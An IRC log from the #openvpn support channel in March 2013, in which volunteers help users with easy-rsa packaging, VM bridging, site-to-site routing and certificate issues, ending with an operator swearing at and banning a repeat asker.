23:52 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 23:53 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 23:54 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 23:54 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn --- Day changed Wed Mar 06 2013 00:36 -!- Wulf4 [~Wulf@unaffiliated/wulf] has joined #openvpn 00:40 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 276 seconds] 01:03 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-lamyntzwqdjvorgy] has quit [Ping timeout: 245 seconds] 01:05 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-obkuahzvfsrfbrdf] has quit [Ping timeout: 245 seconds] 01:07 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-fulzpfazgvsxtjda] has quit [Ping timeout: 245 seconds] 01:26 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 01:39 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 01:43 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 02:07 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 02:09 -!- fluter [~fluter@fedora/fluter] has quit [Remote host closed the connection] 02:15 -!- sdx--- [~idnic@70.39.68.36] has joined #openvpn 02:17 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 02:17 -!- idnic [~idnic@114.79.19.23] has joined #openvpn 02:18 -!- sh_t [~sht@NL2.privatevpn.com] has quit [Read error: Connection reset by peer] 02:20 -!- sh_t [~sht@NL2.privatevpn.com] has joined #openvpn 02:20 -!- sdx--- [~idnic@70.39.68.36] has quit [Ping timeout: 276 seconds] 02:28 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-jabwfdwwnubynxqd] has joined #openvpn 02:31 -!- Wulf4 is now known as Wulf 02:53 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 03:03 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-pgmyjmlyrhmelakt] has joined #openvpn 03:03 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:05 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-txxrmkbetvcozgyg] has 
joined #openvpn 03:23 -!- sdx--- [~idnic@114.79.17.250] has joined #openvpn 03:26 -!- idnic [~idnic@114.79.19.23] has quit [Ping timeout: 260 seconds] 03:27 -!- sdx--- [~idnic@114.79.17.250] has quit [Client Quit] 03:27 -!- zz_AsadH is now known as AsadH 03:37 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 03:38 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 03:50 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 250 seconds] 04:03 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 04:07 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 04:21 -!- DaveTheDude [~FuckOff@69.85.93.87] has joined #openvpn 04:21 < DaveTheDude> !welcome 04:21 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample 04:21 <@vpnHelper> !forum !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 04:22 < DaveTheDude> Hello 04:23 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 04:23 < DaveTheDude> I just tried installing openvpn on a friends vps, typically i have no troubles... but this time i see that the debian 6 repo has been updated to provide 2.3.0 04:24 < DaveTheDude> and i can't find the usual parts to configure openvpn 04:25 < DaveTheDude> was wondering if any of you could tell me where i can find the usual parts? 
04:26 < DaveTheDude> i usually just cd into /etc/openvpn/ 04:26 < DaveTheDude> and then cp -R /usr/share/doc/openvpn/examples/easy-rsa/ /etc/openvpn/ 04:28 -!- Aprogas_ is now known as Aprogas 04:31 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 04:33 -!- fluter [~fluter@fedora/fluter] has quit [Ping timeout: 240 seconds] 04:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 04:40 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 04:48 < DaveTheDude> does 2.3.0 not ship with easy-rsa or something? 04:51 -!- smerz [~smerz@a177088.upc-a.chello.nl] has quit [Ping timeout: 260 seconds] 04:51 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has quit [Ping timeout: 260 seconds] 04:52 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 04:56 -!- JSharpe [~JSharpe@46.165.210.17] has joined #openvpn 04:56 <+EugeneKay> It's been split out in Sid; I don't know about stable 04:57 < DaveTheDude> apparently it has 04:57 <+EugeneKay> I'm not sure where you're getting a 2.3.0 package for stable, as the version on that is 2.1.3 04:58 <+EugeneKay> And testing is only up to 2.2.1 04:58 < DaveTheDude> nah 04:58 <+EugeneKay> That's what packages.debian.org says 04:59 < DaveTheDude> i use openvpn's repos 04:59 <+EugeneKay> I'm not a Debian user myself, so mileage may vary 04:59 < DaveTheDude> https://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 04:59 <@vpnHelper> Title: OpenvpnSoftwareRepos – OpenVPN Community (at community.openvpn.net) 04:59 <+EugeneKay> Ah, OK. I wasn't aware those existed. 
04:59 < DaveTheDude> ;D 05:00 < DaveTheDude> well, i compiled 2.3.0 for myself from source, but i was thrown off by no easy-rsa 05:00 < DaveTheDude> now i know why 05:00 <+EugeneKay> I prefer XCA anyway 05:01 <+EugeneKay> You can grab a copy of easy-rsa from here if you want https://github.com/OpenVPN/easy-rsa 05:01 <@vpnHelper> Title: OpenVPN/easy-rsa · GitHub (at github.com) 05:01 <+EugeneKay> It's just wrappers & .cnf for openssl 05:01 < DaveTheDude> yeah i found that a bit ago 05:01 < DaveTheDude> XCA? 05:02 < DaveTheDude> i'm unfamiliar with that 05:02 <+EugeneKay> !xca 05:02 <@vpnHelper> "xca" is (#1) XCA is a GUI to create/manage a PKI, much more user-friendly than easy-rsa. or (#2) Example XCA PKI for OpenVPN(writeup pending): https://community.openvpn.net/openvpn/wiki/XCA 05:02 < DaveTheDude> oh 05:02 < DaveTheDude> i pretty much only use cli 05:05 -!- dazo_afk is now known as dazo 05:10 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 05:12 -!- DaveTheDude [~FuckOff@69.85.93.87] has quit [Quit: Senkei.Senbonzakura.Kageyoshi] 05:25 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 05:25 < vaillor> hi guys 05:26 < vaillor> what difference is there between privatetunnel.msi and openvpn-install-2.3.0-I004-i686.exe ?? 
05:28 <+EugeneKay> You asked this question two days ago 05:38 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 05:38 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 05:41 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Max SendQ exceeded] 05:46 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 05:47 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 05:47 < vaillor> EugeneKay, yes, and the answer was "the first is proprietary program, the second is open source" 05:47 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 05:47 <+EugeneKay> What makes you think that you will get a different response today? 05:47 -!- latenite [~latenite@138.77.122.145] has joined #openvpn 05:48 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 05:49 < vaillor> i need an answer like: the first one allows you to make thes things... the second one allows you to make these other things... so the first or the second is better... 05:49 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 05:49 < latenite> Hi folks, I have trouble connecting my openvpn server (wich is a virtual machine) to talk to the outside world. The Host and the guest are on different subent and I am clueless how to make them talk to each other. 05:50 < latenite> Can anyone please help me to get this done? 05:50 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 05:50 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 05:51 <+EugeneKay> What brand of virtualization 05:51 < latenite> EugeneKay, LXC 05:52 -!- fluter [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 05:52 <+EugeneKay> Never used it, sorry. 05:52 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 05:52 <+EugeneKay> Looks similar to VZ 05:52 -!- DaveTheDude [~FuckOff@69.85.93.87] has joined #openvpn 05:52 < latenite> EugeneKay, Basicly like any other VM. 
I dont know the basic on the networking side. No matter what kind of VM 05:53 < latenite> EugeneKay, yes it is :D 05:53 <+EugeneKay> Basically, you want the VM to have it's own IP address on the LAN. 05:53 < latenite> EugeneKay, would I have to add additional NICs? 05:53 <+EugeneKay> This is typically known as Bridged Mode 05:53 <+EugeneKay> Physical NIC cards? No. 05:53 < DaveTheDude> hey i was just wondering if anyone could explain the function and use of pkcs11? 05:53 < latenite> EugeneKay, there is no LAN. The host is a rootserver with public IP. 05:53 < DaveTheDude> and the benefit if there is any 05:54 < latenite> The VM has a public as well 05:54 <+EugeneKay> latenite - The "public IP" is a "LAN" for the definition of this exercise 05:54 < latenite> EugeneKay, ok :D 05:54 <+EugeneKay> DaveTheDude - PKI stored on a "Smart Card", basically. 05:54 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 05:55 < latenite> EugeneKay, for now the host has a br0 with the eth0 connecet to it. The host can reach the intenet fine 05:55 <+EugeneKay> DaveTheDude - plus the interface for applications to speak to the smart card for doing crypto stuff using keys/certs stored on the card, without the application actually knowing the private keys 05:55 <+EugeneKay> latenite - sounds right. Now you need to connect the container to br0 05:55 < latenite> The guest is connectet to the bridg (by the VM setup) 05:55 < DaveTheDude> oh i see 05:56 < DaveTheDude> well then it is completely useless to me 05:56 < DaveTheDude> thanks EugeneKay 05:56 <+EugeneKay> DaveTheDude - It's limited-use, yes. 
Mostly the paranoid who don't trust the $SYSTEM, or can't for regulatory reasons(banks, gov't) 05:56 < latenite> EugeneKay, it is connected to the br0 by ...line 15 https://gist.github.com/anonymous/5098689 05:57 <@vpnHelper> Title: gist:5098689 (at gist.github.com) 05:57 < DaveTheDude> thanks again EugeneKay 05:57 < DaveTheDude> have a nice day 05:57 -!- DaveTheDude [~FuckOff@69.85.93.87] has quit [Quit: Senkei.Senbonzakura.Kageyoshi] 05:58 <+EugeneKay> latenite - yeah, that config file is Greek to me 05:58 <+EugeneKay> Sorry 05:58 <+EugeneKay> Try to see if they have an IRC channel 05:58 < latenite> EugeneKay, but the hosts br0 and the VMs eth0 have totaly differnt networks 05:58 < latenite> I already tried. No luck :( 05:59 < latenite> EugeneKay, It not so much about the technologie like LXC, or Vbox. 05:59 <+EugeneKay> With vbox and vmware I've not had to fiddle with br0 in years 05:59 <+EugeneKay> I just set it to Bridge and it does it 05:59 < latenite> EugeneKay, what I dont know is: how to connect a VM to a host when they are on different networks...jet, connected to the same bridge 06:00 <+EugeneKay> Whaddya mean different networks? VLANs? 06:00 <+EugeneKay> Or different IP blocks? 06:01 < latenite> EugeneKay, the host is: inet addr: 176.9.147.201 Bcast:176.9.147.223 Mask:255.255.255.224 06:01 <+EugeneKay> Addressing is layer3; bridging etc is layer2. 06:02 < latenite> and the VM is: inet addr: 5.9.233.2 Bcast:5.9.233.7 06:02 <+EugeneKay> So don't worry about that 06:02 <+EugeneKay> The VM and the Host both send an ARP(L2) for their respective IP addresses(L3) to the switch 06:03 <+EugeneKay> Note: it looks like your VM has a MAC address beginning with 00:00:00:. This is probably not going to work. Change that to a real vendor ID. 06:03 < latenite> So I should be able to ping from 5.9.233.2 to 176.9.147.201 ? When they are both on the same bridge? 06:04 < latenite> there is no route set up. 06:04 <+EugeneKay> Correct. 
It will go out the VM's interface, to the switch and on to the router, then back down the chain. 06:04 < latenite> so how would that ever work? 06:04 < latenite> which router? 06:04 <+EugeneKay> Your datacenter's 06:04 <+EugeneKay> It' the same as any other IP address on the internet, except that the src and dest both happen to exist on the same physical machine 06:05 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:05 < latenite> So since ping fails. Something else must be wrong. 06:05 <+EugeneKay> If you want to talk directly between the VM and Host you will need to set up "Host Only" networking, which is implemented as a loopback adapter. 06:06 <+EugeneKay> If I had to guess, it's your switch rejecting the MAC address of the VM 06:06 < latenite> what would be a valid MAC? 06:07 < latenite> EugeneKay, simply no 0 up front? 06:08 <+EugeneKay> VMware uses 00:0c:29:. Try that. 06:09 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 06:09 < latenite> EugeneKay, still fails 06:09 * EugeneKay shrugs 06:10 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 06:10 < latenite> EugeneKay, in the VM I can only ping its own IP 06:10 <+EugeneKay> Probably something with the bridge. No clue what :-p 06:15 < vaillor> EugeneKay, have you got a step-by-step guide tu set the vpn? 06:20 <+EugeneKay> !howto 06:20 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 06:20 <+EugeneKay> latenite - yup, indicates something's wrong with the bridge. See above :-p 06:23 < latenite> EugeneKay, Would you know a way to test the bridge? 06:27 < latenite> EugeneKay, I cant ping the VM from the host either. 06:27 <+EugeneKay> Like I said, it's been ages since I've fiddled with bridging. 
If you're patient I'm sure somebody with more clue will be around 06:30 < latenite> sure, thank you. I'll just stick around 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:08 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has joined #openvpn 07:09 < TMcTrain> hello 07:10 < TMcTrain> !welcome 07:10 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 07:10 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 07:10 < TMcTrain> !goal 07:10 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 07:23 < TMcTrain> hello I do have the following setup : eth0=WAN; eth1=LAN(192.168.2.1) : eth0=LAN(192.168.2.128); eth1=LAN(192.168.30.1) : eth0=LAN(192.168.30.10) 07:25 < TMcTrain> is isolated from WAN does not have routing enabled for eth1 to eth0 07:32 < TMcTrain> on I installed openvpn access server, forwarded the port from to and managed to set it up to allow to connect to and get a ip-address : LAN=192.168.30.101 07:34 < TMcTrain> from : I can ping : 192.168.30.1 and connect over ssh 07:36 < TMcTrain> I can access from 07:36 < TMcTrain> but I can neither access from nor from 07:37 < TMcTrain> is there a special setting on openvpn access server GUI to get the : LAN=192.168.30.101 to get access directly to : 
eth1=192.168.30.10 07:38 < TMcTrain> ? 07:39 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [Ping timeout: 276 seconds] 07:41 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Quit: ZNC - http://znc.sourceforge.net] 07:44 < rob0> !as 07:44 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 07:45 < TMcTrain> tx 07:45 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 07:53 -!- bjh4 [~bjh4@64.212.193.1] has joined #openvpn 07:54 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has joined #openvpn 07:54 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving] 07:55 < magic_1> hi guys, i just want to make sure how i should tell my server config file about my ccd 07:55 < magic_1> cause it pushes the routes but not seeing the ccd routes? 07:56 < magic_1> just doesn't make sense to me 08:00 <+EugeneKay> You put iroute in the ccd file, and route in your server.conf 08:00 <+EugeneKay> iroute only serves to tell the server which client is responsible for the subnet 08:00 <+EugeneKay> !route 08:01 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! 
or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs 08:01 <@vpnHelper> behind the server or client 08:07 < magic_1> thanks EugeneKay 08:07 < magic_1> was just busy with the server 08:08 < magic_1> the issue that i am having is that site B can ping and access all devices in site A, but site A can't ping or access any devices in Site B 08:08 < magic_1> although both have the required routes 08:08 <+EugeneKay> Sounds like firewall 08:08 < magic_1> i have stopped the firewall on site B to check 08:08 < magic_1> but nothing 08:09 < magic_1> the ping requests are going through to the tun interface on B, but not through, 08:09 <+EugeneKay> You have ip_forwarding turned on? 08:09 <+EugeneKay> Both ends 08:09 < magic_1> i can ping site B tun interface 08:09 < magic_1> yea 08:09 <+EugeneKay> Check the A firewall rules too 08:10 <+EugeneKay> FORWARD table is of the most interest 08:10 < magic_1> will do that now, just thinking though, the requests are reaching the site B tun interface 08:10 < magic_1> just not going through 08:10 < magic_1> and i have checked ip_forwarding is on 08:10 <+EugeneKay> Double check your routes 08:11 <+EugeneKay> They might be going to the wrong place 08:11 < magic_1> even set them up statically 08:11 <+EugeneKay> Just keep beating up on it, you'll find it 08:11 <+EugeneKay> You've come this far, you clearly have enough of an understanding ;-) 08:12 < magic_1> thanks brother, doing that as we speak 08:12 < magic_1> at the moment even trying via routing protocol to see if that is not the issue, the routes are going through no hassle, but only one side working 08:12 < magic_1> but will do 08:31 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:35 -!- magic_1 [~magic@unaffiliated/magic1/x-836121] has quit [Read error: No route to host] 08:50 -!- novaflash is now known as novaflash_away 09:00 -!- novaflash_away is now known as 
novaflash 09:11 -!- p3rror [~mezgani@41.140.180.37] has joined #openvpn 09:26 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn 09:27 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Max SendQ exceeded] 09:28 -!- Porkepix [~Porkepix@157.138.184.18] has joined #openvpn 09:32 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving] 09:32 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 250 seconds] 09:39 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 09:39 -!- raidz_away is now known as raidz 09:39 -!- raidz [~raidz@raidz.im] has quit [Changing host] 09:39 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 09:39 -!- mode/#openvpn [+o raidz] by ChanServ 09:59 < kjs> Guys, I need to generate a self signed certificate for OpenVPN clients, if i copy the CA.crt and key onto my windows desktop I can generate this using easy rsa scripts, right? 10:00 < kjs> they should be in /etc/openvpn/ssl - right ? 10:01 <@ecrist> why not just generate them on the box that has the ca.crt and key now? 10:04 < kjs> there is no easyrsa on that box ? 10:04 <@ecrist> where did you generate certificates before? 10:05 <@ecrist> generally, you need or will want the index for openssl, as well, or you run the risk of duplicate certificates 10:05 < kjs> i've just taken over this, last admin's documentation says to do it on another linux server here with openssl installed... 10:06 <@ecrist> ok, so do that. 10:06 < kjs> then gives https urls to wget the CA cert & key from, that do not exist. 10:06 < kjs> so... I am looking for the right key / cert 10:07 < kjs> should they be at /etc/openvpn/ssl ? 10:07 <@ecrist> they might be 10:07 <@ecrist> truth is, we have no way of knowing where your other admin put the CA cert/key pair 10:08 < kjs> Yeah, i could install openssl on that server and try and sign the keys against that CA and see if it would auth ? 10:09 < kjs> I need the server.key and CA.crt file to generate them, right? 
10:09 <@ecrist> no 10:09 <@ecrist> you need the CA.crt and CA.key 10:09 < kjs> hm 10:10 < kjs> that dir contains... 10:10 < kjs> dh1024.pem srv1-ca.crt srv1-server.crt srv1-server.key 10:11 <@ecrist> none of those are what you need 10:11 < kjs> thought so 10:11 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 245 seconds] 10:11 <@ecrist> I already told you what to look for 10:11 < kjs> yeah looks like I am screwed then 10:12 <@ecrist> I'd find out what server ran that webserver, and go look there for them 10:15 -!- raidz is now known as raidz_away 10:15 -!- raidz_away is now known as raidz 10:19 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 10:24 -!- speed_racer8 [~speed_rac@76.30.149.251] has joined #openvpn 10:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 10:29 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:44 -!- Orbi [~opera@109.129.14.9] has joined #openvpn 10:50 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 10:52 -!- AsadH is now known as zz_AsadH 10:57 -!- jzaw [~jzaw@loki.dzki.co.uk] has joined #openvpn 10:57 < jzaw> afternoon all :) 11:03 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 11:03 <+[oc80z]> moin moin 11:08 -!- albercuba [~albercuba@p57B331F2.dip.t-dialin.net] has joined #openvpn 11:09 < albercuba> hello 11:09 < albercuba> some help please setting openvpn in ubuntu 11:09 < kjs> sigh 11:09 < albercuba> ? 11:09 < albercuba> i can't make it work, need some help 11:09 < pekster> !howto 11:09 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! 
or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 11:10 < albercuba> yes yes, i did read that 11:11 < albercuba> but i can't make it work 11:11 <@dazo> !welcome 11:11 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 11:11 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:11 <@dazo> !welcome 11:12 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 11:12 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:12 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 11:12 <@dazo> albercuba: ^^^ .... all who know something in here and have time may help you out, if you provide the needed info 11:13 < albercuba> ok, i want to set up an openvpn server in ubuntu server 10.04, i did everything but i can't make it work 11:13 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 11:13 <@dazo> !welcome 11:13 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? 
see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 11:13 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:13 <@dazo> albercuba: you didn't read that ^^^ 11:13 < albercuba> i can connect to the server but i cannot surf the web 11:14 < albercuba> dazo, not now, i did it yesterday 11:14 <@dazo> *sigh* 11:14 <@dazo> "we may need !logs and !configs and maybe !interface to help you." 11:14 < albercuba> i even looked for other how-tos, but they are all focused on lan networks 11:14 * dazo gives up 11:15 < pekster> !redirect 11:15 < albercuba> and the problem is that the server i'm using is in canada and has only 1 interface connected directly to internet 11:15 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 11:15 <@vpnHelper> http://ircpimps.org/redirect.png 11:15 < albercuba> it is a vps 11:15 < pekster> Maybe that's what you want? You've specified none of your goals or explained "what" you've tried. If you say "it doesn't work" my only reply is "then it's clearly broken." 
Garbage in, garbage out 11:16 < albercuba> ok maybe i'm not good at explaining things, and my english is not very good 11:17 < albercuba> will check the redirect 11:17 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 240 seconds] 11:22 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 256 seconds] 11:25 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 11:29 -!- albercuba [~albercuba@p57B331F2.dip.t-dialin.net] has quit [Remote host closed the connection] 11:34 -!- latenite [~latenite@138.77.122.145] has quit [Ping timeout: 245 seconds] 11:41 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Ping timeout: 256 seconds] 11:42 -!- Orbi [~opera@109.129.14.9] has quit [Ping timeout: 245 seconds] 11:44 < vaillor> so, my openvpn still isn't working 11:45 -!- Orbi [~opera@anon-184-53.vpn.ipredator.se] has joined #openvpn 11:49 -!- TMcTrain [~kvirc@HSI-KBW-046-005-044-083.hsi8.kabel-badenwuerttemberg.de] has quit [Ping timeout: 248 seconds] 12:01 -!- Orbi [~opera@anon-184-53.vpn.ipredator.se] has quit [Ping timeout: 276 seconds] 12:06 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:06 -!- mode/#openvpn [+o krzee] by ChanServ 12:09 < vaillor> so, do you think it is better to install ora openvpn-install-2.3.0-I004-i686.exe or privatetunnel.msi ? 12:09 -!- Porkepix [~Porkepix@157.138.184.18] has quit [Quit: Computer has gone to sleep.] 12:10 < pekster> !download 12:10 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. 
It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 12:10 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 12:13 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:14 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 12:14 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 12:17 -!- master_o1_master [~master_of@p4FF24E11.dip.t-dialin.net] has joined #openvpn 12:18 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:20 -!- master_of_master [~master_of@p4FF24D0D.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 12:24 < vaillor> pekster, there is no information about privatetunnel.msi 12:26 < pekster> Indeed. That's the proprietary commercial product sold by OpenVPN Technologies. This channel is for support/discussion of the GPL OpenVPN open-source project 12:29 <@ecrist> vaillor: I think there's a private tunnel channel. probably better to ask in #openvpn-as though 12:30 < vaillor> ok 12:30 < vaillor> and what is the official website of openvpn? 12:31 <@ecrist> openvpn.net 12:31 < vaillor> because i found privatetunnel.msi at http://openvpn.net/ 12:31 <@vpnHelper> Title: OpenVPN - Open Source VPN (at openvpn.net) 12:31 <@ecrist> yup 12:31 <+EugeneKay> Jesus tittyfucking christ dude 12:31 <+EugeneKay> How hard is it to comprehend 12:31 <+EugeneKay> There is the OpenVPN Commercial product, and the OpenVPN GPL product 12:31 <+EugeneKay> TWO SEPARATE PROGRAMS 12:31 <@ecrist> OpenVPN has a community (open source) and commercial component 12:31 <+EugeneKay> This is literally the fourth fucking time it has been explained to you 12:31 < vaillor> yes, and they are two different things? 
12:32 <@ecrist> we support the community (open source) component here 12:32 <@ecrist> private tunnel and access server are commercial components 12:32 <@ecrist> they are supported in #openvpn-as 12:32 < vaillor> yes but if they are 2 different things, why is the website the same? 12:32 <@ecrist> OpenVPN has a community (open source) and commercial component 12:32 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 <@ecrist> OpenVPN has a community (open source) and commercial component 12:33 -!- mode/#openvpn [+o EugeneKay] by ChanServ 12:33 -!- mode/#openvpn [+b *!*lol2@*.ip179.fastwebnet.it] by EugeneKay 12:33 -!- vaillor was kicked from #openvpn by EugeneKay [I'm done. Good bye.] 12:33 <@EugeneKay> Two days of this guy. Screw it. 12:33 -!- mode/#openvpn [-o EugeneKay] by EugeneKay 12:33 <@krzee> i ignored him damn near immediately, but i knew it was only 